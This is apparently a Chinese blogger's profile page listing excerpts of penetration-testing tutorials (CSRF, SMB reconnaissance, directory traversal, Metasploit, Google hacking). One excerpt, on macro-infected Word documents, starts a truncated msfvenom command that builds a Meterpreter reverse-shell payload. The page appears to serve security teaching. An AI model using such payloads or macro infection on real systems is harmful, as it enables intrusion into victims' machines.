学神来啦123

分类

安全(30) 技术文章(105) 日常(5)

/ 注册

TA的专栏 80篇文章 1人订阅

《Linux一学就会》

54篇文章 757人学习

《黑客之道》

26篇文章 1449人学习

全部文章（共8篇）

网络安全kali之利用宏感染word文档获取shell 来自专栏

首先将office 2016.zip上传到win7虚拟机上，解压后，安装一下office。 ┌──(root💀xuegod53)-[~] └─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST...

网络安全 kali kali linux 渗透测试 web安全 word

2022-03-25

0 658

网络安全 Kali web安全基于SMB协议收集信息来自专栏

SMB概述：服务器消息块（Server Message Block，缩写为SMB），又称网络文件共享系统（Common Internet File System，缩写为CIFS），一种应用层网络传输协议，由微软开发，主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。经过Un...

网络安全 kali linux smb 运维 web安全

2022-03-23

0 628

网络安全 kali Web安全之CSRF攻击来自专栏

CSRF是什么？ CSRF（Cross Site Request Forgery），中文是跨站点请求伪造。CSRF攻击者在用户已经登录目标网站之后，诱使用户访问一个攻击页面，利用目标网站对用户的信任，以用户身份在攻击页面对目标网站发起伪造用户操作的请求，达到攻击目的。举个例子简单版：假如博...

linux kali web安全网络安全 CSRF

2022-03-16

0 605

Web安全渗透测试基本流程来自专栏

对于web应用的渗透测试，大致可分为三个阶段：信息收集、漏洞发现以及漏洞利用。在实践过程中需要进一步明细测试的流程，以下通过9个阶段来描述渗透测试的整个流程： 1.明确目标 1）确定范围：测试的范围，如：IP、域名、内外网、整站or部分模块 2）确定规则：能渗透到什么程度（发现漏洞为止or继续利用...

web安全 kali 渗透测试渗透网络安全

2022-03-15

2 1449

网络安全 kali web安全【渗透测试】目录遍历漏洞来自专栏

许多的Web应用程序一般会有对服务器的文件读取查看的功能，大多会用到提交的参数来指明文件名形如：http://www.nuanyue.com/getfile=image.jgp 当服务器处理传送过来的image.jpg文件名后，Web应用程序即会自动添加完整路径，形如“d://site/image...

kali linux 网络安全 kali linux web安全

2022-03-14

0 687

网络安全kali web安全 Kali之msf简单的漏洞利用来自专栏

信息收集靶机的IP地址为：192.168.173.136 利用nmap工具扫描其开放端口、系统等整理一下目标系统的相关信息系统版本：Windows server 2003 开放的端口及服务： 21/tcp ftp 135/tcp msrpc 139/tcp netbios-ss...

网络安全 kali web安全渗透测试

2022-03-08

0 665

网络安全kali渗透学习 web渗透入门 Google搜索引擎的使用技巧

Google搜索引擎的使用技巧我们通常使用搜索引擎都是直接搜索自己想要的内容，正常情况下我们都是直接使用语言进行描述问题来进行搜索，然后搜索引擎也有特定语法可以使用，熟练掌握搜索引擎的语法可以让你的搜索效率和准确率大幅度提升，当然我们学习这种技巧是为了寻找存在漏洞的页面，或者存在敏感信息的文件。 ...

网络安全 web安全渗透信息安全

2022-02-09

0 341

网络安全kali渗透学习 web渗透入门 Kali系统的被动信息收集

信息收集的方式可以分为两种：被动和主动。被动信息收集方式是指利用第三方的服务对目标进行访问了解，比例：Google搜索。主动的信息收集方式：通过直接访问、扫描网站，这种将流量流经网站的行为。比如：nmap扫描端口。被动信息收集的目的：通过公开渠道，去获得目标主机的信息，从而不与目标系统直接交互...

网络安全 web安全 kali

2022-01-19

0 372